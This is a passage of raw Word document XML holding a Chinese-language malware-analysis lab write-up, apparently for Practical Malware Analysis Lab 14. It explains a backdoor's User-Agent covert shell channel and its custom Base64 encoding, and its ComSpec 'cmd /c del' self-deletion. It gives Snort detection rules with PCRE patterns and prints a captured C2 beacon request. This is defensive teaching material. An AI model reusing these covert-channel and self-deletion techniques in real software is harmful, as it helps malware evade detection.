                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4158615" cy="240347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在这三种终止情况下，有一个对sub_401880函数的调用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3937000" cy="3896360"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5080"/>
            <wp:docPr id="7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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3937000" cy="3896360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3994150" cy="2444750"/>
            <wp:effectExtent l="0" t="0" r="13970" b="8890"/>
            <wp:docPr id="7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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3994150" cy="2444750"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3696970" cy="3578225"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
            <wp:docPr id="7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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3696970" cy="357822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sub_401880调用的目的是：一旦恶意代码退出，就会从磁盘上删除恶意代码。sub_401880实现了自我删除的ComSpec方法。从本质上讲，ComSpec方法意味着：用定义的ComSpec环境变量，与命令行/c del [executable_to_delete]&gt;nul,来运行一个Shel1Execute命令，而这个命令恰恰是sub_401880函数所做的工作。</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对于URL以外的网络特征，将静态User-Agent域、编码User-Agent域的静态字符，以及编码命令shell提示符的长度和字符限制作为检测目标。</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME_NET any -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EXTERNAL_NET SHTTP_PORTS(msg:"PM14.2.1 Suspicious</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>User-Agent(Internet Surf)"; content:"User-Agent\:|20|Internet|20|surf";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>http_header; sid:20001421; rev:1;)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME_NET any -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EXTERNAL_NET SHTTP_PORTS(msg:"PM14.2.2 Suspicious</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ser-Agent(starts(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;)"; content:“User-Agent\:|20|(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;";http_header;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sid:20001422; rev:1;)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pP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 xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HOME_NET any -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EXTERNAL_NET SHTTP_PORTS(msg:"PM14.2.3 Suspicious</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User-Agent(long B64)"; content:"User-Agent\:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|"; content:!"|20|"; distance:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</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within:100; pcre:"/User-Agent:\x20[^\x</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>d]{0,5}[A-Za-z0-9+\/]{100,)/";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sid:20001423; rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>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前两个特征(20001421和20001422)相对简单，将应该十分罕见的User-Agent头部内容作为检测目标。最后一个特征(20001423)仅将编码命令shell提示符的长度和字符的限制作为检测目标，而不假设20001422规则中相同引导字符的存在。因为这个特征查找的模式并不具体，所以它更可能产生误报。PCRE正则表达式查询User-Agent的头部，以及随后包含Base64字符集中至少100个字符，并允许User-Agent域开头存在至少5个任意字符值(只要它们不换行显示新的头部)。可选的5个字符允许User-Agent字符串有特定的开始，例如在恶意代码中看到的(!&lt;。Base64字符集的100个字符的要求是基于命令提示符的预期长度。</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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后，对空格字符的无用内容搜索纯粹是提高特征的性能。大多数User-Agent字符串会在较靠前的地方包含一个空格字符，所以这项检查将避免对多数User-Agent字符串来测试正则表达式。</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p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind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问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="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分析文件Lab14-02.exe中的恶意代码。为了阻止恶意代码破坏你的系统，恶意代码已经被配置向一个硬编码的回环地址发送信令，但是你可以假想这是一个硬编码的外部地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="0" w:firstLine="482" w:firstLineChars="200"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码编写时直接使用IP地址的好处和坏处各是什么?</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攻击者可能会发现静态IP地址比域名更难管理。使用DNS允许攻击者将他的系统部署到任意一台计算机上，仅仅改变DNS地址就可以动态地重定向他的僵尸主机。对于这两种类型的基础设施，防御者有不同选项来部署防御系统。但是由于同样的原因，IP地址比域名更难处理。这个事实会让攻击者选择静态IP地址，而不是域名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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这个恶意代码使用哪些网络库?使用这些库的好处和坏处是什么?</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恶意代码使用了WinlINet库。这些库的缺点之一就是需要提供一个硬编码的User-Agent字段，另外，如果需要的话，它还要硬编码可选的头部。相比于Winsock API,WinINet库的一个优点是对于一些元素，比如cookic和缓存，可以由操作系统提供。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码信令中URL的信息源是什么?这个信息源提供了哪些优势?</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P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>E文件中的字符串资源节包含一个用于命令和控制的URL。在不重新编译恶意代码的情况下，可以让攻击者使用资源节来部署多个后门程序到多个命令与控制服务器位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码利用了HTTP协议的哪个方面，来完成它的目的?</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攻击者滥用HTTP的User-Agent域，它应该包含应用程序的信息。恶意代码创建了一个线程，来对这个域传出信息进行编码，以及另一个线程，使用静态域表示它是通道的“接收”端。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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在恶意代码的初始信令中传输的是哪种信息?</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初始的信令是一个编码后的shell命令行提示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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这个恶意代码通信信道的设计存在什么缺点?</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尽管攻击者对传出信息进行编码，但他并不对传入命令进行编码。此外，由于服务器必须通过User-Agent域的静态元素，来区分通信信道的两端，所以服务器的依赖关系十分明显，可以将它作为特征生成的目标元素。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码的编码方案是标准的吗?</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编码方案是Base64,但是使用一个自定义的字母。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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通信是如何被终止的?</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使用关键字exit来终止通信。退出时恶意代码会试图删除自己。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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这个恶意代码的目的是什么?在攻击者的工具中，它可能会起到什么作用?</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个恶意代码是一个小且简单的后门程序。它的唯一目的是给远端的攻击者提供一个shell命令接口，而通过查看出站shell命令活动的常见网络特征不能监测到它。基于它尝试删除自己这个事实，我们推断这个特殊的恶意代码可能是攻击者工具包中的一个一次性组件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>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Lab14-3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="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运行恶意代码，看到它产生了以下的信令数据包：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>GET /start.htm HTTP/1.1</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Accept:*/*</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Accept-Language: en-US</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UA-CPU:x86</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Accept-Encoding:gzip,deflate</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User-Agent: User-Agent: Mozilla/4.0(compatible; MSIE 7.0; Windows NT 5.1;</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.NET CLR 3.0.4506.2152;,NET CLR 3.5.30729)</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Host: ww</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.practicalmalwareanalysis.com</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Cache-Control:no-cache</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>导入函数表，发现函数来自于两个库：Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Net和COM。使用到的函数包括InternetOpenA、InternetopenUrlA、InternetCloseHandle和InternetReadFile。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3199765" cy="2441575"/>
            <wp:effectExtent l="0" t="0" r="635" b="12065"/>
            <wp:docPr id="7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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3199765" cy="2441575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3180080" cy="2308860"/>
            <wp:effectExtent l="0" t="0" r="5080" b="7620"/>
            <wp:docPr id="7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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3180080" cy="230886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从WinINet函数开始，到0x004011F3处的InternetopenUrlA函数。注意在InternetopenA之前代码中的静态字符串，</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501515" cy="1555115"/>
            <wp:effectExtent l="0" t="0" r="9525" b="14605"/>
            <wp:docPr id="7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6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4501515" cy="1555115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4436745" cy="955040"/>
            <wp:effectExtent l="0" t="0" r="13335" b="5080"/>
            <wp:docPr id="7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5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4436745" cy="955040"/>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eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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ind w:left="220" w:hanging="220" w:hangingChars="100"/>
              <w:jc w:val="left"/>
              <w:rPr>
